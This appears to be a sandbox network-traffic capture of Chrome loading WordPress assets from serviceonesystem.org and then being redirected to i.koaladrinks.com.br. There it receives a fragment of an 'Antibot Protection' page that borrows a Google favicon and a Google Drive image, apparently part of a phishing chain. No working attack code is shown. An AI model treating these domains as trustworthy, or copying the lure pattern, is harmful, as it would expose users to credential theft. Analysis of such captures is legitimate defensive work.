                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-10 08:27:14 UTC233INHTTP/1.1 200 OK
                                                      Server: nginx/1.26.0
                                                      Date: Fri, 10 Jan 2025 08:27:14 GMT
                                                      Content-Type: text/css
                                                      Content-Length: 2503
                                                      Last-Modified: Mon, 06 Jan 2025 06:39:21 GMT
                                                      Connection: close
                                                      ETag: "677b7a99-9c7"
                                                      Accept-Ranges: bytes
                                                      2025-01-10 08:27:14 UTC2503INData Raw: 2f 2a 0a 54 68 65 6d 65 20 4e 61 6d 65 3a 20 54 77 65 6e 74 79 20 54 77 65 6e 74 79 2d 46 69 76 65 0a 54 68 65 6d 65 20 55 52 49 3a 20 68 74 74 70 73 3a 2f 2f 77 6f 72 64 70 72 65 73 73 2e 6f 72 67 2f 74 68 65 6d 65 73 2f 74 77 65 6e 74 79 74 77 65 6e 74 79 66 69 76 65 2f 0a 41 75 74 68 6f 72 3a 20 74 68 65 20 57 6f 72 64 50 72 65 73 73 20 74 65 61 6d 0a 41 75 74 68 6f 72 20 55 52 49 3a 20 68 74 74 70 73 3a 2f 2f 77 6f 72 64 70 72 65 73 73 2e 6f 72 67 0a 44 65 73 63 72 69 70 74 69 6f 6e 3a 20 54 77 65 6e 74 79 20 54 77 65 6e 74 79 2d 46 69 76 65 20 65 6d 70 68 61 73 69 7a 65 73 20 73 69 6d 70 6c 69 63 69 74 79 20 61 6e 64 20 61 64 61 70 74 61 62 69 6c 69 74 79 2e 20 49 74 20 6f 66 66 65 72 73 20 66 6c 65 78 69 62 6c 65 20 64 65 73 69 67 6e 20 6f 70 74 69
                                                      Data Ascii: /*Theme Name: Twenty Twenty-FiveTheme URI: https://wordpress.org/themes/twentytwentyfive/Author: the WordPress teamAuthor URI: https://wordpress.orgDescription: Twenty Twenty-Five emphasizes simplicity and adaptability. It offers flexible design opti


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      4192.168.2.949723165.22.210.1014432960C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-10 08:27:14 UTC610OUTGET /wp-includes/js/dist/script-modules/interactivity/index.min.js?ver=06b8f695ef48ab2d9277 HTTP/1.1
                                                      Host: serviceonesystem.org
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      Origin: https://cliks.serviceonesystem.org
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: */*
                                                      Sec-Fetch-Site: same-site
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: script
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-10 08:27:14 UTC264INHTTP/1.1 200 OK
                                                      Server: nginx/1.26.0
                                                      Date: Fri, 10 Jan 2025 08:27:14 GMT
                                                      Content-Type: application/javascript; charset=utf-8
                                                      Content-Length: 36695
                                                      Last-Modified: Mon, 06 Jan 2025 06:39:20 GMT
                                                      Connection: close
                                                      ETag: "677b7a98-8f57"
                                                      Accept-Ranges: bytes
                                                      2025-01-10 08:27:14 UTC16120INData Raw: 76 61 72 20 65 3d 7b 36 32 32 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 6e 2e 64 28 74 2c 7b 4f 62 3a 28 29 3d 3e 42 2c 51 76 3a 28 29 3d 3e 56 2c 58 58 3a 28 29 3d 3e 49 2c 66 46 3a 28 29 3d 3e 6f 2c 68 3a 28 29 3d 3e 62 2c 71 36 3a 28 29 3d 3e 7a 2c 75 41 3a 28 29 3d 3e 6b 2c 7a 4f 3a 28 29 3d 3e 73 7d 29 3b 76 61 72 20 72 2c 6f 2c 69 2c 73 2c 75 2c 5f 2c 63 2c 6c 2c 61 2c 66 2c 70 2c 68 2c 76 3d 7b 7d 2c 64 3d 5b 5d 2c 79 3d 2f 61 63 69 74 7c 65 78 28 3f 3a 73 7c 67 7c 6e 7c 70 7c 24 29 7c 72 70 68 7c 67 72 69 64 7c 6f 77 73 7c 6d 6e 63 7c 6e 74 77 7c 69 6e 65 5b 63 68 5d 7c 7a 6f 6f 7c 5e 6f 72 64 7c 69 74 65 72 61 2f 69 2c 67 3d 41 72 72 61 79 2e 69 73 41 72 72 61 79 3b 66 75 6e 63 74 69 6f 6e 20 6d 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 20 69 6e 20 74
                                                      Data Ascii: var e={622:(e,t,n)=>{n.d(t,{Ob:()=>B,Qv:()=>V,XX:()=>I,fF:()=>o,h:()=>b,q6:()=>z,uA:()=>k,zO:()=>s});var r,o,i,s,u,_,c,l,a,f,p,h,v={},d=[],y=/acit|ex(?:s|g|n|p|$)|rph|grid|ows|mnc|ntw|ine[ch]|zoo|^ord|itera/i,g=Array.isArray;function m(e,t){for(var n in t


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      5192.168.2.949726165.22.210.1014432960C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-10 08:27:15 UTC577OUTGET /wp-includes/js/wp-emoji-release.min.js?ver=6.7.1 HTTP/1.1
                                                      Host: serviceonesystem.org
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: */*
                                                      Sec-Fetch-Site: same-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: script
                                                      Referer: https://cliks.serviceonesystem.org/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-10 08:27:16 UTC264INHTTP/1.1 200 OK
                                                      Server: nginx/1.26.0
                                                      Date: Fri, 10 Jan 2025 08:27:15 GMT
                                                      Content-Type: application/javascript; charset=utf-8
                                                      Content-Length: 18726
                                                      Last-Modified: Mon, 06 Jan 2025 06:39:20 GMT
                                                      Connection: close
                                                      ETag: "677b7a98-4926"
                                                      Accept-Ranges: bytes
                                                      2025-01-10 08:27:16 UTC16120INData Raw: 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 2f 2f 20 53 6f 75 72 63 65 3a 20 77 70 2d 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 74 77 65 6d 6f 6a 69 2e 6d 69 6e 2e 6a 73 0a 76 61 72 20 74 77 65 6d 6f 6a 69 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 68 3d 7b 62 61 73 65 3a 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6a 73 64 65 6c 69 76 72 2e 6e 65 74 2f 67 68 2f 6a 64 65 63 6b 65 64 2f 74 77 65 6d 6f 6a 69 40 31 35 2e 30 2e 33 2f 61 73 73 65 74 73 2f 22 2c 65 78 74 3a 22 2e 70 6e 67 22 2c 73 69 7a 65 3a 22 37 32 78 37 32 22 2c 63 6c 61 73 73 4e 61 6d 65 3a 22 65 6d 6f 6a 69 22 2c 63 6f 6e 76 65 72 74 3a 7b 66 72 6f 6d 43 6f 64 65 50 6f 69 6e 74 3a 66 75 6e 63 74
                                                      Data Ascii: /*! This file is auto-generated */// Source: wp-includes/js/twemoji.min.jsvar twemoji=function(){"use strict";var h={base:"https://cdn.jsdelivr.net/gh/jdecked/twemoji@15.0.3/assets/",ext:".png",size:"72x72",className:"emoji",convert:{fromCodePoint:funct
                                                      2025-01-10 08:27:16 UTC2606INData Raw: 72 65 7c 7c 61 2e 69 6d 70 6c 65 6d 65 6e 74 61 74 69 6f 6e 2e 68 61 73 46 65 61 74 75 72 65 28 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 53 56 47 31 31 2f 66 65 61 74 75 72 65 23 49 6d 61 67 65 22 2c 22 31 2e 31 22 29 7d 66 75 6e 63 74 69 6f 6e 20 73 28 29 7b 69 66 28 21 74 29 7b 69 66 28 76 6f 69 64 20 30 3d 3d 3d 63 2e 74 77 65 6d 6f 6a 69 29 72 65 74 75 72 6e 20 36 30 30 3c 72 3f 76 6f 69 64 20 30 3a 28 63 2e 63 6c 65 61 72 54 69 6d 65 6f 75 74 28 75 29 2c 75 3d 63 2e 73 65 74 54 69 6d 65 6f 75 74 28 73 2c 35 30 29 2c 76 6f 69 64 20 72 2b 2b 29 3b 6e 3d 63 2e 74 77 65 6d 6f 6a 69 2c 74 3d 21 30 2c 65 26 26 6e 65 77 20 65 28 66 75 6e 63 74 69 6f 6e 28 75 29 7b 66 6f 72 28 76 61 72 20 65 2c 74 2c 6e 2c 61 2c 72 3d 75 2e 6c 65 6e
                                                      Data Ascii: re||a.implementation.hasFeature("http://www.w3.org/TR/SVG11/feature#Image","1.1")}function s(){if(!t){if(void 0===c.twemoji)return 600<r?void 0:(c.clearTimeout(u),u=c.setTimeout(s,50),void r++);n=c.twemoji,t=!0,e&&new e(function(u){for(var e,t,n,a,r=u.len


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      6192.168.2.949725165.22.210.1014432960C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-10 08:27:15 UTC655OUTGET /wp-content/themes/twentytwentyfive/assets/fonts/manrope/Manrope-VariableFont_wght.woff2 HTTP/1.1
                                                      Host: serviceonesystem.org
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      Origin: https://cliks.serviceonesystem.org
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: */*
                                                      Sec-Fetch-Site: same-site
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: font
                                                      Referer: https://cliks.serviceonesystem.org/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-10 08:27:16 UTC237INHTTP/1.1 200 OK
                                                      Server: nginx/1.26.0
                                                      Date: Fri, 10 Jan 2025 08:27:15 GMT
                                                      Content-Type: font/woff2
                                                      Content-Length: 53600
                                                      Last-Modified: Mon, 06 Jan 2025 06:39:21 GMT
                                                      Connection: close
                                                      ETag: "677b7a99-d160"
                                                      Accept-Ranges: bytes
                                                      2025-01-10 08:27:16 UTC16147INData Raw: 77 4f 46 32 00 01 00 00 00 00 d1 60 00 13 00 00 00 02 86 d0 00 00 d0 ee 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 50 1b 81 a5 0a 1c 9e 4e 3f 48 56 41 52 8b 7a 06 60 3f 53 54 41 54 81 02 00 8d 6c 2f 6a 11 08 0a 84 81 14 83 a0 74 0b 8b 4a 00 30 83 cc 12 01 36 02 24 03 97 10 04 20 05 8a 76 07 ae 27 0c 07 5b 95 4f 72 06 75 b2 a4 7c 42 9d aa 6e 43 38 00 9f ba b2 36 a1 d4 0a 65 dc 9e a0 ee b2 7f 35 77 e8 02 97 8c 6d 59 30 83 f3 00 04 d5 9f 4d 33 fb ff ff ff b3 93 89 1c 76 09 2e 69 6a da 29 86 67 fb 0d 54 cc 93 47 1e b3 78 4c a5 56 04 22 9e 98 45 4b 69 49 2b 26 44 6c f1 da 11 08 34 ec a8 23 e7 17 e1 35 e1 e8 3a a3 fa 39 8a 43 04 4c 59 94 49 4c 4a 08 d3 1e fa b6 f3 4f c9 7f 2a 87 b7 c8 83 ea 85 0a 93 a6 90 5a 23 41 49 12 54 bc b7
                                                      Data Ascii: wOF2`PN?HVARz`?STATl/jtJ06$ v'[Oru|BnC86e5wmY0M3v.ij)gTGxLV"EKiI+&Dl4#5:9CLYILJO*Z#AIT
                                                      2025-01-10 08:27:16 UTC16384INData Raw: 08 30 08 9b b1 f7 84 db 19 59 fd 19 e7 d7 8b 93 1d 2b 73 c3 36 24 e1 11 20 c0 de 55 af 9d 07 ba d1 1f 8f bd 7b 13 e3 bc ca a3 fd 26 65 12 55 17 19 bf 73 6b 6c 98 bc 37 3e 65 d0 5b d5 1b b7 0f fd b5 dc 6b 31 15 a8 82 ea 9d ae d6 05 ca 7b 41 a2 d9 53 be 20 22 42 2a cd 8e a4 ef d5 6a 3d f0 63 f5 8a ff 38 b2 00 4a 8c 3a 38 78 55 48 4e 26 93 6c 0c 7f dc f0 50 e7 60 e7 76 b9 cb 64 08 aa 13 d0 3a 0f 0d fc 07 d4 77 2e f1 62 da a6 5f 99 1d 23 4b d4 3a 47 ce e6 7f 0e fe ac 3d 95 2c 34 71 62 83 b3 93 77 ce 63 f2 0b 17 24 ba 57 ca a3 09 2b 73 43 ca 6b 06 ef b0 d7 57 3e 17 6e 38 ed ac d5 39 da 17 d5 76 4e 92 d5 e9 83 89 ac 22 84 44 17 94 84 4e f1 e7 19 e4 1b 4b 12 a3 0c 3c 06 b6 a1 48 7c 2c 14 f0 ca 89 56 cb 42 53 02 b9 89 65 49 ab 05 66 51 2a f9 0d 31 ae 78 d5 63 30
                                                      Data Ascii: 0Y+s6$ U{&eUskl7>e[k1{AS "B*j=c8J:8xUHN&lP`vd:w.b_#K:G=,4qbwc$W+sCkW>n89vN"DNK<H|,VBSeIfQ*1xc0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      7192.168.2.949728165.22.210.1014432960C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-10 08:27:17 UTC392OUTGET /wp-includes/js/wp-emoji-release.min.js?ver=6.7.1 HTTP/1.1
                                                      Host: serviceonesystem.org
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-10 08:27:18 UTC264INHTTP/1.1 200 OK
                                                      Server: nginx/1.26.0
                                                      Date: Fri, 10 Jan 2025 08:27:18 GMT
                                                      Content-Type: application/javascript; charset=utf-8
                                                      Content-Length: 18726
                                                      Last-Modified: Mon, 06 Jan 2025 06:39:20 GMT
                                                      Connection: close
                                                      ETag: "677b7a98-4926"
                                                      Accept-Ranges: bytes
                                                      2025-01-10 08:27:18 UTC16120INData Raw: 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 2f 2f 20 53 6f 75 72 63 65 3a 20 77 70 2d 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 74 77 65 6d 6f 6a 69 2e 6d 69 6e 2e 6a 73 0a 76 61 72 20 74 77 65 6d 6f 6a 69 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 68 3d 7b 62 61 73 65 3a 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6a 73 64 65 6c 69 76 72 2e 6e 65 74 2f 67 68 2f 6a 64 65 63 6b 65 64 2f 74 77 65 6d 6f 6a 69 40 31 35 2e 30 2e 33 2f 61 73 73 65 74 73 2f 22 2c 65 78 74 3a 22 2e 70 6e 67 22 2c 73 69 7a 65 3a 22 37 32 78 37 32 22 2c 63 6c 61 73 73 4e 61 6d 65 3a 22 65 6d 6f 6a 69 22 2c 63 6f 6e 76 65 72 74 3a 7b 66 72 6f 6d 43 6f 64 65 50 6f 69 6e 74 3a 66 75 6e 63 74
                                                      Data Ascii: /*! This file is auto-generated */// Source: wp-includes/js/twemoji.min.jsvar twemoji=function(){"use strict";var h={base:"https://cdn.jsdelivr.net/gh/jdecked/twemoji@15.0.3/assets/",ext:".png",size:"72x72",className:"emoji",convert:{fromCodePoint:funct
                                                      2025-01-10 08:27:18 UTC2606INData Raw: 72 65 7c 7c 61 2e 69 6d 70 6c 65 6d 65 6e 74 61 74 69 6f 6e 2e 68 61 73 46 65 61 74 75 72 65 28 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 53 56 47 31 31 2f 66 65 61 74 75 72 65 23 49 6d 61 67 65 22 2c 22 31 2e 31 22 29 7d 66 75 6e 63 74 69 6f 6e 20 73 28 29 7b 69 66 28 21 74 29 7b 69 66 28 76 6f 69 64 20 30 3d 3d 3d 63 2e 74 77 65 6d 6f 6a 69 29 72 65 74 75 72 6e 20 36 30 30 3c 72 3f 76 6f 69 64 20 30 3a 28 63 2e 63 6c 65 61 72 54 69 6d 65 6f 75 74 28 75 29 2c 75 3d 63 2e 73 65 74 54 69 6d 65 6f 75 74 28 73 2c 35 30 29 2c 76 6f 69 64 20 72 2b 2b 29 3b 6e 3d 63 2e 74 77 65 6d 6f 6a 69 2c 74 3d 21 30 2c 65 26 26 6e 65 77 20 65 28 66 75 6e 63 74 69 6f 6e 28 75 29 7b 66 6f 72 28 76 61 72 20 65 2c 74 2c 6e 2c 61 2c 72 3d 75 2e 6c 65 6e
                                                      Data Ascii: re||a.implementation.hasFeature("http://www.w3.org/TR/SVG11/feature#Image","1.1")}function s(){if(!t){if(void 0===c.twemoji)return 600<r?void 0:(c.clearTimeout(u),u=c.setTimeout(s,50),void r++);n=c.twemoji,t=!0,e&&new e(function(u){for(var e,t,n,a,r=u.len


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      8192.168.2.949730139.59.30.1934432960C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-10 08:27:17 UTC703OUTGET /XZoMKBqJ HTTP/1.1
                                                      Host: i.koaladrinks.com.br
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      sec-ch-ua-platform: "Windows"
                                                      Upgrade-Insecure-Requests: 1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                      Sec-Fetch-Site: cross-site
                                                      Sec-Fetch-Mode: navigate
                                                      Sec-Fetch-Dest: document
                                                      Referer: https://cliks.serviceonesystem.org/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-10 08:27:18 UTC17INHTTP/1.1 200 OK
                                                      2025-01-10 08:27:18 UTC35INData Raw: 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6e 6f 2d 73 74 6f 72 65 0d 0a
                                                      Data Ascii: Cache-Control: no-cache, no-store
                                                      2025-01-10 08:27:18 UTC19INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                      Data Ascii: Connection: close
                                                      2025-01-10 08:27:18 UTC25INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a
                                                      Data Ascii: Content-Type: text/html
                                                      2025-01-10 08:27:18 UTC162INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 38 30 31 64 2d 63 65 34 61 3d 61 35 64 32 64 37 30 64 63 34 36 37 62 63 66 38 35 37 66 34 66 32 30 38 62 32 34 62 34 39 35 30 64 65 32 34 63 62 33 64 32 65 39 30 61 63 36 61 64 63 38 36 38 39 39 37 61 35 66 32 37 32 30 32 3b 20 50 61 74 68 3d 2f 3b 20 44 6f 6d 61 69 6e 3d 6b 6f 61 6c 61 64 72 69 6e 6b 73 2e 63 6f 6d 2e 62 72 3b 20 45 78 70 69 72 65 73 3d 46 72 69 2c 20 31 30 20 4a 61 6e 20 32 30 32 35 20 30 39 3a 32 37 3a 31 38 20 47 4d 54 0d 0a
                                                      Data Ascii: Set-Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202; Path=/; Domain=koaladrinks.com.br; Expires=Fri, 10 Jan 2025 09:27:18 GMT
                                                      2025-01-10 08:27:18 UTC28INData Raw: 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a
                                                      Data Ascii: Transfer-Encoding: chunked
                                                      2025-01-10 08:27:18 UTC2INData Raw: 0d 0a
                                                      Data Ascii:
                                                      2025-01-10 08:27:18 UTC5INData Raw: 63 66 39 0d 0a
                                                      Data Ascii: cf9
                                                      2025-01-10 08:27:18 UTC3321INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 6e 74 69 62 6f 74 20 50 72 6f 74 65 63 74 69 6f 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 2c 20 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 75 72 6c 28 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 65 6c 65 64 61 74 61 69 63 74 2e 63 6f 6d 2f
                                                      Data Ascii: <html><head> <title>Antibot Protection</title> <link rel="icon" type="image/x-icon" href="https://google.com/favicon.ico"> <meta charset="UTF-8"> <style> body, html { background-image: url("https://www.teledataict.com/
                                                      2025-01-10 08:27:18 UTC2INData Raw: 0d 0a
                                                      Data Ascii:
                                                      2025-01-10 08:27:18 UTC3INData Raw: 30 0d 0a
                                                      Data Ascii: 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      9192.168.2.949732172.66.43.954432960C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-10 08:27:19 UTC613OUTGET /media/2017/03/google-drive.jpg HTTP/1.1
                                                      Host: www.teledataict.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                      Sec-Fetch-Site: cross-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: image
                                                      Referer: https://i.koaladrinks.com.br/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-10 08:27:19 UTC918INHTTP/1.1 200 OK
                                                      Date: Fri, 10 Jan 2025 08:27:19 GMT
                                                      Content-Type: image/jpeg
                                                      Content-Length: 22545
                                                      Connection: close
                                                      Cf-Bgj: imgq:100,h2pri
                                                      Cf-Polished: origSize=24194
                                                      Last-Modified: Sun, 15 Oct 2017 10:40:30 GMT
                                                      Cache-Control: max-age=14400
                                                      CF-Cache-Status: HIT
                                                      Accept-Ranges: bytes
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=31PgyfEWSprZdu4QqyaWZ33BF5IuUN5vHRWJmz0QRjDpivot1zwdelxSp3Ch9zCI6DihV%2BEkny055wOn8PwjIxy909B%2BFlpYcl9emWVotXw4Tqy6hxInxqmKrFQVxBMLM65wDfo%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 8ffb498669f54268-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1849&min_rtt=1842&rtt_var=705&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2837&recv_bytes=1191&delivery_rate=1536842&cwnd=252&unsent_bytes=0&cid=ab9a1f4e22b88f70&ts=145&x=0"
                                                      2025-01-10 08:27:19 UTC451INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 04 04 05 04 03 05 05 04 05 06 06 05 06 08 0e 09 08 07 07 08 11 0c 0d 0a 0e 14 11 15 14 13 11 13 13 16 18 1f 1b 16 17 1e 17 13 13 1b 25 1c 1e 20 21 23 23 23 15 1a 26 29 26 22 29 1f 22 23 22 01 06 06 06 08 07 08 10 09 09 10 22 16 13 16 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 ff c2 00 11 08 02 58 03 84 03 01 22 00 02 11 01 03 11 01 ff c4 00 35 00 01 00 01 05 01 01 00 00 00 00 00 00 00 00 00 00 00 03 01 02 04 05 07 06 08 01 01 00 02 03 01 01 00 00 00 00 00 00 00 00 00 00 00 04 05 01 02 03 06 07 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 ea 43 e7 de dc 00 00 b7 53 b8 c3 99 13
                                                      Data Ascii: JFIF% !###&)&")"#""""""""""""""""""""""""""""""""""""""""""""""""""""X"5CS
                                                      2025-01-10 08:27:19 UTC1369INData Raw: 03 17 27 49 23 10 8b 3c 00 00 00 01 9e 2b a7 00 00 00 01 ab 8f 65 ad b9 aa 09 1c 40 00 00 00 00 00 00 00 00 00 00 01 76 33 93 9b 4a d1 db 07 3e 80 00 00 00 5d 9f ae c8 e7 cb 2c 71 e0 00 00 00 00 00 00 00 00 00 00 00 00 2c cb 13 57 7d 96 d8 0e 98 00 00 00 03 3d 55 74 da 2a 28 a8 a2 a2 8a 8a 2a 29 ad d9 c7 df 8e a9 55 cd 65 15 14 54 51 51 45 45 15 14 54 51 51 45 45 15 14 54 51 51 45 45 15 14 54 51 51 4c f8 76 d0 a5 40 9d 5d 3a 04 e2 04 e2 04 e2 04 e2 04 e2 04 e2 04 e3 22 48 26 8f 1a aa 34 c5 54 15 50 55 41 55 05 54 15 50 55 41 55 05 54 15 50 55 41 55 05 54 15 50 55 41 5d 6e 6e 92 5e 2d 55 3d 45 45 15 14 54 51 51 45 45 15 1e 88 6f a8 03 69 b6 ba b7 ae b2 47 0f 28 22 c9 00 0c 28 36 3a e8 32 83 8f 51 ed bb f0 f1 23 87 70 09 3d cc 88 fe 09 ec f0 37 d7 cd 88 92
                                                      Data Ascii: 'I#<+e@v3J>],q,W}=Ut*(*)UeTQQEETQQEETQQEETQQLv@]:"H&4TPUAUTPUAUTPUAUTPUA]nn^-U=EETQQEEoiG("(6:2Q#p=7
                                                      2025-01-10 08:27:19 UTC1369INData Raw: c8 9e f3 9f 72 f9 99 56 94 56 59 2d 98 cc 11 e4 47 af 5c 78 f2 22 d3 ac 11 cf 1e bd 60 b2 6b 35 e9 4f b7 38 b7 d2 f2 bd 8e 07 32 eb 7e 2b c6 7b af 2e 3e 4d e8 40 00 00 00 7b ef 03 99 e8 61 f5 24 33 7d c7 ca e0 72 ce c5 e2 ab e7 f8 f1 49 70 00 00 00 03 03 27 06 2f 70 8b 20 00 00 00 00 00 00 00 00 da 0b 48 00 00 00 00 00 00 00 00 06 ba cc dc 2a f9 61 cf a0 00 00 dc e9 ba f5 84 1d d5 4f 63 e5 9c e3 a0 7c 81 8f 3f e7 ab 4a f0 f9 b0 0a 54 47 1c d6 6b b4 11 e4 47 8e 98 f1 cf 1f 3e d0 6c b0 3e 96 de cf ab 6c e9 59 9f 48 63 e4 35 df 94 41 ed 7c 57 c2 3d 68 52 49 00 00 00 03 d7 7a fe 49 d3 be bb e7 73 a2 95 ed aa b9 36 1f 44 e7 7e 73 d0 04 69 00 00 02 95 c6 d7 38 f6 15 b3 41 90 00 00 00 00 00 00 00 03 68 2d 20 00 00 00 00 00 00 00 00 0d 7e c2 2e 5b e0 08 13 00 00
                                                      Data Ascii: rVVY-G\x"`k5O82~+{.>M@{a$3}rIp'/p H*aOc|?JTGkG>l>lYHc5A|W=hRIzIs6D~si8Ah- ~.[
